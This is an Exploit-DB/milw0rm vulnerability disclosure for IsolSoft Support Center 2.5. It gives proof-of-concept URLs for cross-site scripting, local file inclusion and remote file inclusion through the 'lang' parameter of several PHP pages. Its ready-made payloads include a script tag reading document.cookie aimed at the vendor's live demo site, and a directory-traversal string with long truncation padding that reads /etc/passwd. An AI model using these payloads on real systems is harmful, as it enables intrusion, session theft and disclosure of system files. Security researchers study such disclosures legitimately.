IsolSoft Support Center 2.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

EDB-ID:

9397


Author:

Moudi

Type:

webapps


Platform:

PHP

Date:

2009-08-07


/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://www.isolsoft.com/

Greetings : Mizoz, Zuka, str0ke, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in newticket (lang).

- Poc:
  http://127.0.0.1/newticket.php?lang=[XSS]
  http://www.isolsoft.com/demo/newticket.php?lang="><script>alert(document.cookie);</script>

[+] Exploit LFI:

- Vulnerable code in index.php (lang).
- Vulnerable code in newticket.php (lang).
- Vulnerable code in rempass.php (lang).

- Poc:
  http://127.0.0.1/index.php?adduser=true&lang=[LFI]
  http://127.0.0.1/newticket.php?lang=[LFI]
  http://127.0.0.1/rempass.php?lang=[LFI]
  http://www.isolsoft.com/demo/index.php?adduser=true&lang=[LFI]
  http://www.isolsoft.com/demo/newticket.php?lang=[LFI]
  http://www.isolsoft.com/demo/rempass.php?lang=[LFI]

LFI => ../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..

[+] Exploit RFI:

- Vulnerable code in index.php (lang).
- Vulnerable code in newticket.php (lang).
- Vulnerable code in rempass.php (lang).

- Poc:
  http://127.0.0.1/index.php?adduser=true&lang=[RFI]
  http://127.0.0.1/newticket.php?lang=[RFI]
  http://127.0.0.1/rempass.php?lang=[RFI]

# milw0rm.com [2009-08-07]